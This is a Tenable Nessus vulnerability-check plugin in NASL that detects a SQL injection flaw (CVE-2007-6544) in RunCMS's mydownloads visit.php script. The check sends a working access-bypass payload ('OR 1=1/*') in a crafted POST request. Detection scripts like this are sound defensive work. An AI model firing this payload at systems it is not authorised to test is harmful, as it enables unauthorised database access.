#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(29853);
  script_version("$Revision: 1.2 $");

  script_cve_id("CVE-2007-6544");
  script_bugtraq_id(27019);

  script_name(english:"RunCMS lid Parameter SQL Injection Vulnerability");
  script_summary(english:"Tries to bypass XoopsDownload::isAccessible()");

  desc = "
Synopsis :

The remote web server contains a PHP script that is prone to a SQL
injection attack. 

Description :

The version of this software installed on the remote host fails to
sanitize user-supplied input to the 'lid' parameter of the
'modules/mydownloads/visit.php' script before using it in a database
query.  Regardless of PHP's 'magic_quotes_gpc' and 'register_globals'
settings, an attacker may be able to exploit this issue to manipulate
database queries, leading to disclosure of sensitive information,
modification of data, or attacks against the underlying database. 

The application is also reportedly affected by similar issues in
several other scripts, although Nessus has not tested for them. 

See also :

http://archives.neohapsis.com/archives/bugtraq/2007-12/0297.html
http://www.milw0rm.com/exploits/4787
http://www.milw0rm.com/exploits/4790
http://runcms.org/modules/news/article_storyid_32.html

Solution :

Upgrade to RunCMS version 1.6.1 or later. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("runcms_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/runcms"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
  dir = matches[2];

  # Make sure the script exists.
  url = string(dir, "/modules/mydownloads/visit.php");

  req = http_get(item:url, port:port);
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # If so...
  if (
    'http-equiv="Refresh" content="' >< res &&
    '/modules/mydownloads" />' >< res
  )
  {
    # Try a couple of times to find an inaccessible / non-existent lid.
    #
    # nb: this will probably work the first time.
    tries = 5;
    for (iter=1; iter<=tries; iter++)
    {
      lid = rand();

      req = http_get(item:string(url, "?lid=", lid), port:port);
      res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
      if (res == NULL) exit(0);

      # If it's inaccessible / non-existent...
      if (
        'http-equiv="Refresh" content="' >< res &&
        '/user.php" />' >< res
      )
      {
        # Now try to bypass the XoopsDownload::isAccessible() check.
        exploit = string(lid, " OR 1=1/*");
        exploit = str_replace(find:" ", replace:"%20", string:exploit);
        postdata = string("lid=", exploit);

        req = string(
          "POST ", url, " HTTP/1.1\r\n",
          "Host: ", get_host_name(), "\r\n",
          "User-Agent: ", get_kb_item("global_settings/http_user_agent"), "\r\n",
          "Content-Type: application/x-www-form-urlencoded\r\n",
          "Content-Length: ", strlen(postdata), "\r\n",
          "\r\n",
          postdata
        );
        res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
        if (res == NULL) exit(0);

        # There's a problem if...
        if (
          # we see a redirect to an empty URL or...
          'http-equiv="Refresh" content="0; URL=" />' >< res ||
          # we see an error because we didn't pass in a referer.
          (
            'http-equiv="Refresh" content="' >< res &&
            '/modules/mydownloads/singlefile.php?lid=0' >< res
          )
        )
        {
          security_hole(port);
          exit(0);
        }
      }
    }
  }
}
